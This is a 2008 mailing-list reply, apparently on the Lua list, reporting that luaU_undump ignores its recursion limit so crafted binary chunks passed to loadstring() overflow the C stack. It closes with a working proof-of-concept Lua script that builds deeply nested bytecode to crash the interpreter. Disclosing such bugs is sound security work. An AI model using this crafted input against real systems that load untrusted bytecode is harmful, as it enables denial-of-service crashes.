[Date Prev][Date Next][Thread Prev][Thread Next]
[Date Index]
[Thread Index]
- Subject: Re: Specially crafted binary chunks can cause Lua to crash
- From: "Greg Falcon" <veloso@...>
- Date: Tue, 25 Mar 2008 22:54:18 -0400
So now I'm really suspicious of loadstring() in the face of malicious
input. luaG_checkcode seems like a really difficult thing to get
right, and your examples seem to back that up.
I have a third loadstring() vulnerability to report, on a slightly
different attack vector. luaU_undump recursively parses its input but
does not respect LUAI_MAXCCALLS, so a maliciously crafted input can
blow the C stack.
Below is proof-of-concept code. Apologies for the opaque
implementation; this code only works on standard x86 builds, and
simulates a deeply nested
local function a() local function a() local function a() ... end end end
which the compiler won't allow.
Greg F
function crash(depth)
local init = '\27\76\117\97\81\0\1\4\4\4\8\0\7\0\0\0\61\115\116' ..
'\100\105\110\0\1\0\0\0\1\0\0\0\0\0\0\2\2\0\0\0\36' ..
'\0\0\0\30\0\128\0\0\0\0\0\1\0\0\0\0\0\0\0\1\0\0\0' ..
'\1\0\0\0\0\0\0\2'
local mid = '\1\0\0\0\30\0\128\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0'
local fin = '\0\0\0\0\0\0\0\2\0\0\0\1\0\0\0\1\0\0\0\1\0\0\0\2\0' ..
'\0\0\97\0\1\0\0\0\1\0\0\0\0\0\0\0'
local lch = '\2\0\0\0\36\0\0\0\30\0\128\0\0\0\0\0\1\0\0\0\0\0\0' ..
'\0\1\0\0\0\1\0\0\0\0\0\0\2'
local rch = '\0\0\0\0\0\0\0\2\0\0\0\1\0\0\0\1\0\0\0\1\0\0\0\2\0' ..
'\0\0\97\0\1\0\0\0\1'
for i=1,depth do lch,rch = lch..lch,rch..rch end
loadstring(init .. lch .. mid .. rch .. fin)
end
for i=1,25 do print(i); crash(i) end
